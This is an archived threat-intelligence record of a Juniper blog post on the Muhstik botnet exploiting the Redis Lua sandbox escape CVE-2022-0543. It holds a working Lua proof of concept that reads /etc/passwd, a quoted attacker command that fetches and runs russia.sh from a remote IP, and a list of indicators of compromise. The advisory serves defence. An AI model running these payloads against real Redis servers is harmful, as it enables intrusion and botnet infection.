{
	"id": "a138e804-8af6-4b41-ad11-aaf6d93e6ed1",
	"created_at": "2026-04-06T00:19:13.597662Z",
	"updated_at": "2026-04-10T03:21:04.921834Z",
	"deleted_at": null,
	"sha1_hash": "cb125f0a1752cdc963086e2f1b6a599665b6b34b",
	"title": "Muhstik Gang targets Redis Servers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 372754,
	"plain_text": "Muhstik Gang targets Redis Servers\r\nBy Paul Kimayong\r\nPublished: 2022-03-25 · Archived: 2026-04-05 14:06:44 UTC\r\nMuhstik Gang targets Redis Servers\r\nJuniper Threat Labs has uncovered an attack that targets Redis Servers using a recently disclosed vulnerability,\r\nnamely CVE-2022-0543. This vulnerability exists in some Redis Debian packages. The attack started on March\r\n11, 2022 from the same threat actor we’ve seen targeting confluence servers back in September 2021 and the same\r\ngroup targeting Log4j back in December. The payload used is a variant of Muhstik bot that can be used to launch\r\nDDOS attacks\r\nCVE-2022-0543: Redis Lua Sandbox Escape and Remote Code Execution\r\n“Redis is a very widely used service for caching, but it’s also used as a message broker. Clients talk to a\r\nRedis server over a socket, send commands, and the server changes its state (i.e. its in-memory\r\nstructures), in response to such commands. Redis embeds the Lua programming language as its\r\nscripting engine, which is made available through the eval command. The Lua engine is expected to be\r\nsandboxed, i.e., clients can interact with the Redis APIs from Lua, but should not be able to execute\r\narbitrary code on the machine where Redis is running.“\r\n– Reginaldo Silva\r\nhttps://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers\r\nPage 1 of 6\n\nIn January 2022, Reginaldo Silva discovered a vulnerability in Redis (Debian-specific) that allows Lua sandbox\r\nescape. A remote attacker with the ability to execute arbitrary Lua scripts could escape the Lua sandbox and\r\nexecute arbitrary code on the host. \r\nThis vulnerability existed because the Lua library in some Debian/Ubuntu packages is provided as a dynamic\r\nlibrary (Ubuntu Bionic and Trusty are not affected). When the Lua interpreter initializes, the “package” variable is\r\nautomatically populated, and that in turn permitted access to arbitrary Lua functionality.  \r\n For instance, we can use “package.loadlib”  to load the modules from “liblua” library, then use this module to\r\nexecute commands.  \r\n The following is a proof of concept on how to exploit this vulnerability. \r\nlocal io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\");\r\nlocal io = io_l();\r\nlocal f = io.popen(\"cat /etc/passwd\", \"r\");\r\nlocal res = f:read(\"*a\");\r\nf:close();\r\nreturn res\r\nTo demonstrate this attack, we instantiated a vulnerable Redis server and launched the above Lua scripts using the\r\n“eval” command. As you can observe from the screenshot below, we are able to achieve code execution by\r\ndumping the contents of /etc/passwd.  \r\nProof of concept of executing system commands inside the Redis session\r\nPayload: Muhstik bot \r\nhttps://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers\r\nPage 2 of 6\n\ntimeline of attacks on CVE-2022-0543\r\nOn March 11, Juniper Threat Labs observed attacks launching this exploit from our telemetry. The attack attempts\r\nto download “russia.sh” using wget or curl from “106[.]246.224.219”. It saves it as “/tmp/russ” and executes it. \r\neval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\");\r\nlocal io = io_l();\r\nlocal f = io.popen(\"(wget -O /tmp/russ https://106[.]246.224.219/russia.sh || curl -o /tmp/russ https\r\nchmod 700 /tmp/russ; /tmp/russ\", \"r\");\r\nlocal res = f:read(\"*a\"); f:close(); return res' 0\r\ncontents of russia.sh\r\nhttps://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers\r\nPage 3 of 6\n\nThis script (russia.sh) will further download and execute linux binaries from 160[.]16.58.163. These binaries are\r\nidentified to be variants of Muhstik bot. This bot connects to an IRC server to receive commands which include\r\nthe following:  \r\nDownload files  \r\nShell commands  \r\nFlood attacks  \r\nSSH brute force \r\nStrings inside Muhstik bot indicating its capabilities\r\nThreat Actor \r\nWe mapped the originating IP of these attacks to figure out if these are related to some groups we are tracking. We\r\nfound that the following IPs was used in the past to launch attacks: \r\n170[.]210.45.163 \r\n191[.]232.38.25  \r\n79[.]172.212.132  \r\nFor instance, the IP 191.232.38.25 was used in September 2021 to launch attacks on Confluence Servers\r\nexploiting CVE-2021-26084. We have documented that attack here. It’s worth noting that the group is still using\r\nthe same Muhstik bot. The same IP was again used in December to launch attacks on Apache Log4j. \r\nhttps://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers\r\nPage 4 of 6\n\nTimeline of observed attacks launched from 191[.]232.38.25\r\nConclusion \r\n We advise those who may be vulnerable to patch their Redis service. Debian and Ubuntu have also released\r\nsecurity advisories regarding this matter. Links are below: \r\nDebian Advisory \r\nUbuntu Advisory \r\nIndicators of Compromise \r\n 4817893f8e724cbc5186e17f46d316223b7683dcbc9643e364b5913f8d2a9197  pty1\r\n46389c117c5f41b60e10f965b3674b3b77189b504b0aeb5c2da67adf55a7129f  pty10\r\n95d1fca8bea30d9629fdf05e6ba0fc6195eb0a86f99ea021b17cb8823db9d78b  pty2\r\n7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3  pty3\r\n16b4093813e2923e9ee70b888f0d50f972ac607253b00f25e4be44993d263bd2  pty4\r\n28443c0a9bfd8a12c12a2aad3cc97d2e8998a9d8825fcf3643d46012f18713f0  pty5\r\n36a2ac597030f3f3425153f5933adc3ca62259c35f687fde5587b8f5466d7d54  russia.sh\r\n Download IP\r\n106[.]246.224.219\r\n160[.]16.58.163\r\nAttacker IP \r\n104[.]236.150.159\r\n170[.]210.45.163\r\n146[.]185.136.187\r\n178[.]62.69.4\r\n191[.]232.38.25\r\n79[.]172.212.132\r\n221[.]120.103.253\r\nReference: \r\nhttps://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers\r\nPage 5 of 6\n\nhttps://github.com/vulhub/vulhub/tree/master/redis/CVE-2022-0543\r\nhttps://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce\r\nhttps://github.com/vulhub/vulhub/tree/master/redis/CVE-2022-0543\r\nSource: https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers\r\nhttps://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers"
	],
	"report_names": [
		"muhstik-gang-targets-redis-servers"
	],
	"threat_actors": [],
	"ts_created_at": 1775434753,
	"ts_updated_at": 1775791264,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cb125f0a1752cdc963086e2f1b6a599665b6b34b.pdf",
		"text": "https://archive.orkl.eu/cb125f0a1752cdc963086e2f1b6a599665b6b34b.txt",
		"img": "https://archive.orkl.eu/cb125f0a1752cdc963086e2f1b6a599665b6b34b.jpg"
	}
}